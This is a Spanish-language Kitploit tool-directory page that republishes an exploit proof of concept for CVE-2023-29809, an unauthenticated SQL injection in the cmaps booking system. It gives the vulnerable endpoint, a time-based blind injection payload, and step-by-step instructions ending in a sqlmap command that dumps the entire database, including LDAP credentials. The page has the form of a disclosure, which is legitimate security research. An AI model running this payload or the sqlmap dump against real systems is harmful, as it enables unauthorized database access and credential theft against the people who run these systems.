Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-29809 — Prueba de concepto de exploit para CVE-2023-29809: inyección SQL no autenticada en el sistema de reservas cmaps. Demuestra inyección ciega basada en tiempo y proporciona el comando sqlmap para la extracción de la base de datos. | Kitploit
Herramientas/GitHubGitHub/zprototype/cve-2023-29809
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubzprototype/cve-2023-29809

CVE-2023-29809

Prueba de concepto de exploit para CVE-2023-29809: inyección SQL no autenticada en el sistema de reservas cmaps. Demuestra inyección ciega basada en tiempo y proporciona el comando sqlmap para la extracción de la base de datos.

Ver Repositorio
112hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Título del exploit: Inyección SQL no autenticada

  • Google Dork:
  • Fecha: 27.04.2023
  • Autor del exploit: Lucas Noki (0xPrototype)
  • Página web del proveedor: https://github.com/vogtmh
  • Enlace del software: https://github.com/vogtmh/cmaps
  • Versión: 8.0
  • Probado en: Mac, Windows, Linux
  • CVE : CVE-2023-29809

Descripción:

La vulnerabilidad encontrada es una inyección SQL. El parámetro bookmap es vulnerable. Al visitar la página: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test obtenemos la respuesta JSON normal. Sin embargo, si se añade una comilla simple al valor del parámetro bookmap, obtenemos un mensaje de error:

root@kitploit:~
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />

Ahora bien, si se añaden dos comillas simples, obtenemos la respuesta normal sin error. Esto confirma la posibilidad de inyección SQL. Para demostrar realmente la inyección SQL, añadimos el siguiente payload:

root@kitploit:~
'-(select*from(select+sleep(2)+from+dual)a)--+

La página tardará dos segundos en responder. Esto confirma la inyección SQL.

Pasos para reproducir:

  1. Envía el siguiente payload para probar la vulnerabilidad: '-(select*from(select+sleep(2)+from+dual)a)--+

  2. Si el sitio tardó dos segundos en responder, ejecuta el siguiente comando sqlmap para volcar toda la base de datos, incluidas las credenciales LDAP.

    root@kitploit:~
    python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
    

Un agradecimiento especial a iCaotix, quien me ayudó enormemente con la configuración del entorno y con la depuración de mi payload.

Petición al servidor:

Screenshot 2023-04-30 at 22.23.51

Respuesta del servidor:

Observa el tiempo de respuesta.

Screenshot 2023-04-30 at 22.24.35
Descargar herramienta